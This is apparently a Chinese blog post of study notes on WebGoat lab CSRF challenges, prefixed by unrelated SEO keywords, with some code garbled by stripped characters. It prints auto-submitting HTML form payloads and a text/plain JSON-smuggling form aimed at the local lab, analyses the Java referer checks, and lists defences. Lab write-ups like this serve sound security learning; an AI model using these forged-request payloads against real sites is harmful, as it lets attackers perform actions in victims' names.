上海网站建设包括哪些,微博推广方式,智能建站网,四川建设公共查询平台前言#xff1a; 堕落了三个月#xff0c;现在因为被找实习而困扰#xff0c;着实自己能力不足#xff0c;从今天开始 每天沉淀一点点 #xff0c;准备秋招 加油 注意#xff1a; 本文章参考qax的网络安全java代码审计和部分师傅审计思路以及webgoat靶场#xff0c;记录…前言 堕落了三个月现在因为被找实习而困扰着实自己能力不足从今天开始 每天沉淀一点点 准备秋招 加油 注意 本文章参考qax的网络安全java代码审计和部分师傅审计思路以及webgoat靶场记录自己的学习过程还希望各位博主 师傅 大佬 勿喷还希望大家指出错误 CSRF漏洞 CSRF全称Cross-Site Request Forgery漏洞中文名称为跨站请求伪造指网站的功能存在缺陷可允许攻击者预先构造请求诱导其他用户提交该请求并产生危害 跨站点请求伪造是对 Web 浏览器的“混淆代理”攻击。CSRF通常具有以下特征 它涉及依赖于用户身份的网站。 它利用了网站对该身份的信任。 它诱使用户的浏览器向目标站点发送 HTTP 请求。 它涉及具有副作用的 HTTP 请求。 CSRF 攻击以/滥用基本 Web 功能为目标。如果网站允许这会导致服务器上的状态发生变化例如更改受害者的电子邮件地址或密码或购买 东西。强制受害者检索数据不会使攻击者受益因为攻击者不会收到响应而受害者会收到响应。 因此CSRF 攻击以状态更改请求为目标。 Webgoat靶场实战
第一种敏感功能缺乏CSRF防护机制
0x03 提交抓包获取 像这种抓包没有发现Token或者验证码的 很容易出现CSRF漏洞 而且只有Referer防护措施 我们只需测试Referer字段就可以了
这里利用方式有 好几种我们直接可以利用BP里面的一键生成CSRF payload功能 利用burp直接generate csrf poc,然后点击Test in browser就可以模拟一次csrf攻击了。 表单代码
html!-- CSRF PoC - generated by Burp Suite Professional --bodyform actionhttp://127.0.0.1:8080/WebGoat/csrf/basic-get-flag methodPOSTinput typehidden namecsrf valuefalse /input typehidden namesubmit valueæ#143;#144;äº#164;æ#159;#165;è#175;#162; /input typesubmit valueSubmit request //formscripthistory.pushState(, , /);document.forms[0].submit();/script/body
/html
此时Burpsuite生成了一个POC一个HTML页面并将自己作为一个web服务器恶意Web服务器B浏览器通过生成的URL即可访问页面 若可信任服务器正常响应这个请求说明漏洞利用成功 利用成功说明存在CSRF漏洞 我们根据地址查看源码CSRFGetFlag.java
PostMapping(path /csrf/basic-get-flag,produces {application/json})ResponseBodypublic MapString, Object invoke(HttpServletRequest req) {MapString, Object response new HashMap();String host (req.getHeader(host) null) ? NULL : req.getHeader(host);String referer (req.getHeader(referer) null) ? NULL : req.getHeader(referer);String[] refererArr referer.split(/);if (referer.equals(NULL)) {if (true.equals(req.getParameter(csrf))) {Random random new Random();userSessionData.setValue(csrf-get-success, random.nextInt(65536));response.put(success, true);response.put(message, pluginMessages.getMessage(csrf-get-null-referer.success));response.put(flag, userSessionData.getValue(csrf-get-success));} else {Random random new Random();userSessionData.setValue(csrf-get-success, random.nextInt(65536));response.put(success, true);response.put(message, pluginMessages.getMessage(csrf-get-other-referer.success));response.put(flag, userSessionData.getValue(csrf-get-success));}} else if (refererArr[2].equals(host)) {response.put(success, false);response.put(message, Appears the request came from the original host);response.put(flag, null);} else {Random random new Random();userSessionData.setValue(csrf-get-success, random.nextInt(65536));response.put(success, true);response.put(message, pluginMessages.getMessage(csrf-get-other-referer.success));response.put(flag, userSessionData.getValue(csrf-get-success));}return response;}
}
首先看这个 String host (req.getHeader(host) null) ? NULL : req.getHeader(host);String referer (req.getHeader(referer) null) ? NULL : req.getHeader(referer);String[] refererArr referer.split(/);//使用/字符将referer字符串拆分为字符串数组refererArr。
检查请求头中的host和referer字段是否存在并将它们的值分别存储在量host和referer中。如果值为null则将其设置为字符串NULL。
我们直接看到下面这行代码
else if (refererArr[2].equals(host)) {// 请求来自原始主机response.put(success, false);response.put(message, Appears the request came from the original host);response.put(flag, null);
}
如果referer不为NULL则检查referer的第二个元素即主机名是否等于host。如果相等表示请求来自于原始主机设置响应的属性来指示请求无效。
else {Random random new Random();userSessionData.setValue(csrf-get-success, random.nextInt(65536));response.put(success, true);response.put(message, pluginMessages.getMessage(csrf-get-other-referer.success));response.put(flag, userSessionData.getValue(csrf-get-success));
}
如果referer不为NULL且不是来自原始主机则生成一个随机数并将其放入用户会话数据中然后设置响应的属性。
这里也就对应了上边host地址和Referer不一样的原因 其实有个更快捷的方法根据代码分析 如果referer不为NULL且不是来自原始主机则生成一个随机数并将其放入用户会话数据中然后设置响应的属性。就是直接修改Referer的值就可以实现CSRF
0x04
这一关其实跟上关差不多 一样方法
源代码ForgedReviews.java if (referer ! NULL refererArr[2].equals(host)) {return failed(this).feedback(csrf-same-host).build();} else {return success(this).feedback(csrf-review.success).build(); // feedback(xss-stored-comment-failure)}
只要判定referer不为空且 则检查referer的第二个元素即主机名是否等于host就触发CSRF漏洞了 第二种网站可允许写入 CSRF payload
0x07
我们随便输入抓包得到 POST提交的数据类型为JSON 根据题目的意思就是进行跨域请求了
那么关于JSON的跨域请求可以参考下边这篇文章
https://www.secpulse.com/archives/61297.html 题目是没有验证Content-type 那我们可以使用form表单提交来实现跨域请求 可以参考
https://blog.csdn.net/haochangdi123/article/details/104812970 我们可以构造利用上传html文件进行请求实现跨域。
html
form nameattack enctypetext/plain actionhttp://localhost:8080/WebGoat/csrf/feedback/message METHODPOST
input typehidden name{name: Testf, email: teddst1233163.com, subject: service, message: valuedsaffd}
/form
scriptdocument.attack.submit();
/script
/html
这里的关键也就是上文所说的将 json拼接在input属性中也就是下面这行
构造出的POST数据为
{name: Testf, email: teddst1233163.com, message: dsaffd}
这就是为什么如果只将json放在name里不写value值的话json数据末尾会多一个自然也就无法解析成功了。
然后打开重新登入之后就利用成功了 原理是请求wolf返回的html向webgoat发送了请求提交了表单。该请求的origin和referer都是wolf的地址所以实现了跨域请求。
我们查看源码
PostMapping(value /csrf/feedback/message,produces {application/json})ResponseBodypublic AttackResult completed(HttpServletRequest request, RequestBody String feedback) {try {objectMapper.enable(DeserializationFeature.FAIL_ON_IGNORED_PROPERTIES);objectMapper.enable(DeserializationFeature.FAIL_ON_NULL_FOR_PRIMITIVES);objectMapper.enable(DeserializationFeature.FAIL_ON_NUMBERS_FOR_ENUMS);objectMapper.enable(DeserializationFeature.FAIL_ON_READING_DUP_TREE_KEY);objectMapper.enable(DeserializationFeature.FAIL_ON_MISSING_CREATOR_PROPERTIES);objectMapper.enable(DeserializationFeature.FAIL_ON_TRAILING_TOKENS);objectMapper.readValue(feedback.getBytes(), Map.class);} catch (IOException e) {return failed(this).feedback(ExceptionUtils.getStackTrace(e)).build();}boolean correctCSRF requestContainsWebGoatCookie(request.getCookies()) request.getContentType().contains(MediaType.TEXT_PLAIN_VALUE);correctCSRF hostOrRefererDifferentHost(request);if (correctCSRF) {String flag UUID.randomUUID().toString();userSessionData.setValue(csrf-feedback, flag);return success(this).feedback(csrf-feedback-success).feedbackArgs(flag).build();}return failed(this).build();}
重点看下面这段 boolean correctCSRF requestContainsWebGoatCookie(request.getCookies()) request.getContentType().contains(MediaType.TEXT_PLAIN_VALUE);
//执行第一个CSRF检查条件检查请求中是否包含名为WebGoatCookie的Cookie。requestContainsWebGoatCookie(request.getCookies())方法用于检查是否存在该Cookie。
检查请求的内容类型是否包含text/plain。request.getContentType().contains(MediaType.TEXT_PLAIN_VALUE)用于检查内容类型。
如果上述两个条件均满足则将correctCSRF保持为true否则将其设置为falsecorrectCSRF hostOrRefererDifferentHost(request);
//执行第二个CSRF检查条件调用hostOrRefererDifferentHost(request)方法该方法用于检查请求的host和referer字段是否来自不同的主机。
如果host和referer字段来自不同的主机则将correctCSRF保持为true否则将其设置为false。
如果都为真就进入下边
if (correctCSRF) {String flag UUID.randomUUID().toString();userSessionData.setValue(csrf-feedback, flag);return success(this).feedback(csrf-feedback-success).feedbackArgs(flag).build();}return failed(this).build();
如果correctCSRF为true表示通过了CSRF检查。生成一个随机的UUID作为csrf-feedback的值并将其存储到userSessionData中。
所以我们能得到一个随机flag 通过源码分析 我们就可以直接利用上面分析出来的漏洞 1. content-type 的值要为 text/plain 2.Host和Referer的字段来自不同的主机 3.请求要携带wengoatCookie 所以我们直接利用就发现了CSRF漏洞 防护 1. 在敏感请求提交的表单中加入随机的Token或验证码防止攻击者预测 2.合理校验请求的Referer判断请求是否来自本站或其他授权的域名还需预防写入CSRF paylaod攻击这就需要禁止用户自定义任意标签的链接属性 3.spring 和 默认情况下Tomcat 会启用此功能。 4.阻断CSRF攻击源头尽量避免在页面提供可被任意用户篡改的链接
